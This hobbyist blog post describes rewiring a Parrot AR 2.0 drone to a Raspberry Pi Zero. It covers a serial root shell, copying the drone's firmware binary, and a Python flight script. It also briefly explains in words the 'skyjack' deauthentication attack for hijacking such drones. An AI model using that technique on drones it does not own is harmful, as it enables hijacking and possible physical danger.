SmellsLikeML

AR-2.0 Drone Hacks

1/10/18

AR 2.0, UART, TX/RX, Serial, Hack

After working to push the limits of the Raspberry Pi Zero in a hackster.io contest, we wanted to trade the dog biometric sensors for telemetry and navigation sensors of the Parrot AR 2.0 drone.

The factory hardware is extremely limited and we would like the computer vision enabled Pi Zero to access the video stream and issue commands.

Out of the factory, the AR 2.0 drone is configured as a wifi access point with SSID starting with: 'ardrone2_'. This network configuration is susceptible to the skyjack whereby an attacker issues deauth packets to clients connected to the AP, perhaps enabled by a USB wifi adapter. This bumps the client device off 192.168.1.2 making way for the attacker to connect over the only IP the AR takes commands from, effectively hijacking the drone.

Unlike dogs, the drone has a serial port. This makes wiring the pi zero directly to the embedded hardware attractive. This should be a faster, more fault-tolerant means to stream video for processing and controlling the drone. Begin by disconnecting jumper cables from the GPIO header, not going to need a heart rate monitor.

Here, we establish a connection via USB to TTL Serial converter. Of course, for this investigation, you can simply plug the USB directly into your computer rather than ssh'ing through the Pi Zero.

The 6-pin serial port is most easily accessible by peeling back the plastic plate under the body of the drone.

Here we see the wiring more closely. Pictured, the orange ground wire, the white wire goes from TX to RX and the yellow goes RX to TX. Make sure not to wire RX to RX!

After making this physical connection, you will issue the command: screen /dev/ttyUSB0 115200 from the pi zero command line (baud rate: 115200). Then, reboot the drone to get dropped into a shell with root privileges. One might consider reconfiguring the network SSID to misdirect a would be attacker.


screen /dev/ttyUSB0 115200

We could have simply used telnet to ssh into the same place after connecting to the wifi network but the point is we used the serial port. This means we can work with the drone if wifi connectivity becomes impossible. More importantly to us, this provides a physical connection between the drone and pi zero.

In this shell, you see the AR Drone runs BusyBox, an embedded Linux OS. Now, open a new tab and run screen -d to identify the process id and then run screen -X -S process_ID quit. This kills the process so that you can redirect the information provided upon rebooting into a file with: cat /dev/ttyUSB0 >> AR_bootup_info.txt


screen -d # new tab to get remote process id
screen -X -S process_ID quit  # quit process
echo 'reboot' > /dev/ttyUSB0   # run 'reboot' command from pi
cat /dev/ttyUSB0 >> AR_bootup_info.txt  # redirect to file

Inspecting this file after rebooting, we find the ATCmdServer starting up at boot. Grepping the file system with grep -nr ATCmdServer, you'll identify the program.elf file. This is the main program and its source code is not openly available.

Security experts offer a detailed review of their investigations into the platform. They point out that program.elf prevents any other process from accessing the two onboard cameras. They detail overwriting shared library code to introduce a hook to access the device handles. They block read/write to copy buffered images for processing to a folder in the /tmp directory to make use of the RAM. But our pi zero already has a camera. We want to stream from the drone's as well as access the magnetometer, ultrasound, accelerometer and altimeter data while issuing controls conditioned on some programming logic executed on the zero.

I consider what information I might be able to extract from the program.elf. To do this, I needed to get the file onto another computer so I plugged in a USB after shutdown. Then, from the screen on /dev/ttyUSB0, after bootup, you can copy /bin/program.elf to /data/video/USB0/ and power down the drone, unplug the USB, and copy to your computer.


echo 'cp /bin/program.elf /data/video/USB0/' > /dev/ttyUSB0

From here, I hoped to reverse engineer program.elf. However, we ran into a wall in attempts to gain information using objdump and gbd. Running readelf -h program.elf offered more information.

It seems that for now, the best way to control the AR 2.0 is through TCP/UDP ports 5554, 5555, 5556 using Hayes AT commands via sockets as done in this repo. Otherwise, you may undertake building up program.elf's replacement after mapping out the sensors and servos.

Chapter 3 of the AR Drone 2.0 developer SDK makes it clear that direct hardware access is not supported.

Part II: Repurpose the USB to TTL

Since program.elf wants data moving through TCP, we can ignore the serial port. Although the serial port provides power, we can hack the USB to TTL adapter connecting to the USB port on the top of the AR-Drone near the battery compartment, since we have it around. Then we can route wires through the drone body connecting to the Pi0 to pins 2 and 6 (5V and GND).

This is more convenient than drawing power through the serial port since space between the board and the panel beneath is limited. This adapter also helps to regulate power to the pi zero, wiring directly from serial to the pins would likely cause problems. Further, since we can access data via TCP, we can stream to the pi zero file system instead of mounting a USB.

Here you can see that I've used a pi zero without the GPIO headers soldered on. This provides a little more clearance to squeeze the computer into the space shared by the AR embedded hardware.

I've also swapped the infrared cameras of poochpak for the humble picam to reduce power consumption. A dab of hot glue to fix the cam case to the back of the drone, this offers another viewpoint directly accessible to the pi zero.

From here, I tucked cables into the drone internal compartments and connected the pi0 to the ar-drone network. You can do this with peripherals or ssh through your personal network to change the /etc/wpa_suplicant/wpa_suplicant.conf file to the drone's SSID.

For the first test flight, I used these modules. Since we have openCV from the last project, I can stream the video to the pi zero using cv2.VideoCapture('tcp://192.168.1.1:5555'). I wrote a short script to take off, hover, stream video and navigation data, then land and disconnect.


import cv2
from time import sleep
import ardrone

MAX_FLIGHT_TIME = 60
cam = cv2.VideoCapture(
           'tcp://192.168.1.1:5555')
print('Video Stream Connected')
drone = ardrone.ARDrone()
drone.reset()
print('Initialized Drone')
sleep(5)
drone.takeoff()
print('Drone Taking Off')
sleep(5)

running = True
i = 0
while running and i < MAX_FLIGHT_TIME:
    i += 1
    running, frame = cam.read()
    print(frame)
    print(drone.navdata)

drone.land()
drone.halt()
cam.release()

This script was made executable and I set the crontab to kick this off at a specific time and then I waited. The drone took off, hovered, began to turn and then elevated until wedging into the corner at the ceiling of my apartment. A valuable lesson here: I could have lost the drone to the wind if I weren't inside. You'll want to test in a space where the drone can't get away. It's also worth noting the inherent danger in setting an out-of-control drone loose. I need to introduce a kill switch, but we are on the verge of programmed flight for the drone which has been enabled with object recognition using YOLO.